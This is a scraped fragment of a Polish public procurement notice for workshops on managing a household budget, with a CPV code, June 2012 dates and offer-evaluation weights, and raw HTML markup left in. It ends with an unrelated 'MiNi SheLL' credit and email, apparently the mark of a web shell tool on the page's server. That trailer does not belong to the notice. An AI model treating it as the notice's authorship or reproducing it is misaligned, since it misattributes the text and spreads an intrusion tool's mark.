Celem warsztatów jest podniesienie racjonalności gospodarowania budżetem domowym i zarządzania własnym gospodarstwem domowym. Realizacja programu powinna się przyczynić do podwyższenia umiejętności społecznych i wychowawczych.
2. Wspólny Słownik Zamówień (CPV): 80530000-8
3. Czas trwania lub termin wykonania: Dni robocze  w terminie od 11.06.2012 r. do 13.06.2012 r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 11.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie Wykonawcy - 20</li>
<li>3. Kwalifikacje kadry dydaktycznej - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com